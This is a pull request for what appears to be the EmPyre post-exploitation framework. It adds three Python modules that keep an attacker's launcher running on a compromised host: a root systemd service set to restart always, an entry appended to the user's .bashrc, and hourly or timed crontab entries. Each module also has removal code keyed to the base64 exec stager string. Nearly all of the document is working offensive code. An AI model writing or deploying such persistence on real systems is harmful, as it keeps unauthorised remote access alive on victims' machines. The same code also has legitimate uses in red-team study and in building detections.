### PR TITLE
Three new persistence modules added

### DIFF
--- a/lib/common/helpers.py
+++ b/lib/common/helpers.py
@@ -608,7 +608,7 @@ def lhost():
                 return socket.inet_ntoa(fcntl.ioctl(
                         s.fileno(),
                         0x8915,  # SIOCGIFADDR
-                        struct.pack('256s', ifname[:15])
+                        struct.pack('256s', str(ifname[:15]))
                     )[20:24])
             except IOError as e:
                 return ""

--- a/lib/modules/python/persistence/linux/systemd_service.py
+++ b/lib/modules/python/persistence/linux/systemd_service.py
@@ -1,0 +1,129 @@
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Persistence with systemd service unit and Launcher code',
+
+            # list of one or more authors for the module
+            'Author': ['@sleventyeleven'],
+
+            # more verbose multi-line description of the module
+            'Description': 'This module establishes persistence via systemd',
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : True,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # list of any references/other comments
+            'Comments': ['']
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to establish persistence',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Remove' : {
+                'Description'   :   'Remove Persistence. True/False',
+                'Required'      :   False,
+                'Value'         :   ''
+            },
+            'ServiceName' : {
+                'Description'   :   'Name of the Systemd service unit',
+                'Required'      :   False,
+                'Value'         :   'python-proxy'
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'LittleSnitch' : {
+                'Description'   :   'Set for stager LittleSnitch checks.',
+                'Required'      :   True,
+                'Value'         :   'False'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self):
+        Remove = self.options['Remove']['Value']
+        listenerName = self.options['Listener']['Value']
+        serviceName = self.options['ServiceName']['Value']
+        littleSnitch = self.options['LittleSnitch']['Value']
+        userAgent = self.options['Agent']['Value']
+
+        # generate the launcher code
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent,  littlesnitch=littleSnitch)
+        launcher = launcher.replace('"', '\"')
+        launcher = launcher.replace("'", "\\'")
+        launcher = launcher.replace(" | python &", "")
+        launcher = launcher.replace("echo ", "")
+        if launcher == "":
+            print helpers.color("[!] Error in launcher command generation.")
+            return ""
+
+        script = """
+import subprocess
+import sys
+import os
+Remove = "%s"
+if os.path.isdir("/usr/lib/systemd"):
+    if Remove == "True":
+        print subprocess.Popen('rm /usr/lib/systemd/system/%s.service && systemctl daemon-reload', shell=True, stdout=subprocess.PIPE).stdout.read()
+        print "Finished"
+    else:
+        try:
+            os.makedirs('/usr/lib/systemd/system')
+        except OSError:
+            if not os.path.isdir('/usr/lib/systemd/system'):
+                raise
+        serviceFile = open('/usr/lib/systemd/system/%s.service', 'w')
+        serviceFile.write('[Unit]\\n')
+        serviceFile.write('Description=%s Manager Service\\n')
+        serviceFile.write('After=network-online.target\\n')
+        serviceFile.write('Wants=network-online.target\\n\\n')
+        serviceFile.write('[Service]\\n')
+        serviceFile.write('Type=forking\\n')
+        serviceFile.write('ExecStart=/usr/bin/python -c %s\\n')
+        serviceFile.write('Restart=always\\n')
+        serviceFile.write('RestartSec=1\\n')
+        serviceFile.write('User=root\\n')
+        serviceFile.write('TimeoutSec=1200\\n\\n')
+        serviceFile.write('[Install]\\n')
+        serviceFile.write('WantedBy=multi-user.target\\n')
+        serviceFile.close()
+        print subprocess.Popen('systemctl daemon-reload && systemctl enable %s.service && systemctl start %s.service', shell=True, stdout=subprocess.PIPE).stdout.read()
+        print "Finished"
+""" % (Remove, serviceName, serviceName, serviceName, launcher,  serviceName, serviceName)
+        return script

--- a/lib/modules/python/persistence/multi/bashrc.py
+++ b/lib/modules/python/persistence/multi/bashrc.py
@@ -1,0 +1,104 @@
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Persistence with bashrc via Launcher code',
+
+            # list of one or more authors for the module
+            'Author': ['@sleventyeleven'],
+
+            # more verbose multi-line description of the module
+            'Description': 'This module establishes persistence via .bashrc',
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # list of any references/other comments
+            'Comments': ['']
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to establish a crontab',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Remove' : {
+                'Description'   :   'Remove Persistence. True/False',
+                'Required'      :   False,
+                'Value'         :   ''
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'LittleSnitch' : {
+                'Description'   :   'Set for stager LittleSnitch checks.',
+                'Required'      :   True,
+                'Value'         :   'False'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self):
+        Remove = self.options['Remove']['Value']
+        listenerName = self.options['Listener']['Value']
+        littleSnitch = self.options['LittleSnitch']['Value']
+        userAgent = self.options['Agent']['Value']
+
+        # generate the launcher code
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent,  littlesnitch=littleSnitch)
+        launcher = launcher.replace('"', '\\\\"')
+        launcher = launcher.replace("'", "\\'")
+        if launcher == "":
+            print helpers.color("[!] Error in launcher command generation.")
+            return ""
+
+        script = """
+import subprocess
+Remove = "%s"
+
+
+if Remove == "True":
+    print subprocess.Popen("sed -i '' '/import sys,base64;exec(base64.b64decode(/d' ~/.bashrc", shell=True, stdout=subprocess.PIPE).stdout.read()
+    print "Finished"
+
+else:
+    print subprocess.Popen('echo "%s" >> ~/.bashrc', shell=True, stdout=subprocess.PIPE).stdout.read()
+    print "Finished"
+
+
+
+""" % (Remove, launcher)
+        return script

--- a/lib/modules/python/persistence/multi/crontab_launcher.py
+++ b/lib/modules/python/persistence/multi/crontab_launcher.py
@@ -1,0 +1,123 @@
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Persistence with crontab via Launcher code',
+
+            # list of one or more authors for the module
+            'Author': ['@424f424f', '@sleventyeleven'],
+
+            # more verbose multi-line description of the module
+            'Description': 'This module establishes persistence via crontab',
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # list of any references/other comments
+            'Comments': ['']
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to establish a crontab',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Remove' : {
+                'Description'   :   'Remove All Persistence. True/False',
+                'Required'      :   False,
+                'Value'         :   ''
+            },
+            'Hourly' : {
+                'Description'   :   'Hourly persistence.',
+                'Required'      :   False,
+                'Value'         :   ''
+            },
+            'Hour' : {
+                'Description'   :   'Hour to callback. 24hr format.',
+                'Required'      :   False,
+                'Value'         :   ''
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'LittleSnitch' : {
+                'Description'   :   'Set for stager LittleSnitch checks.',
+                'Required'      :   True,
+                'Value'         :   'True'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self):
+        Remove = self.options['Remove']['Value']
+        Hourly = self.options['Hourly']['Value']
+        Hour = self.options['Hour']['Value']
+        listenerName = self.options['Listener']['Value']
+        littleSnitch = self.options['LittleSnitch']['Value']
+        userAgent = self.options['Agent']['Value']
+
+        # generate the launcher code
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent,  littlesnitch=littleSnitch)
+        launcher = launcher.replace('"', '\\\\"')
+        launcher = launcher.replace("'", "\\'")
+        if launcher == "":
+            print helpers.color("[!] Error in launcher command generation.")
+            return ""
+
+        script = """
+import subprocess
+import sys
+Remove = "%s"
+Hourly = "%s"
+Hour = "%s"
+if Remove == "True":
+    cmd = 'crontab -l | grep -v "import sys,base64;exec(base64.b64decode("  | crontab -'
+    print subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
+    print subprocess.Popen('crontab -l', shell=True, stdout=subprocess.PIPE).stdout.read()
+    print "Finished"
+else:
+    if Hourly == "True":
+        cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'
+        print subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
+        print subprocess.Popen('crontab -l', shell=True, stdout=subprocess.PIPE).stdout.read()
+        print "Finished"
+    elif Hour:
+            cmd = 'crontab -l | { cat; echo "%s * * * * %s"; } | crontab -'
+            print subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
+            print subprocess.Popen('crontab -l', shell=True, stdout=subprocess.PIPE).stdout.read()
+            print "Finished"
+""" % (Remove, Hourly, Hour, launcher,  Hour, launcher)
+        return script


### PR DESCRIPTION
Adding three of my personal persistence modules

Crontab_launcher -> generates launcher code and uses it as the payload within the crontab instead of dropping a file containing the payload.
Systemd_service -> creates a systemd service on the system to keep the generated launcher code running at all times.
Bashrc -> added generated launcher code to the current users .bashrc file, so the payload is run each time the user opens a shell/terminal.

Also per: EmpireProject/EmPyre#49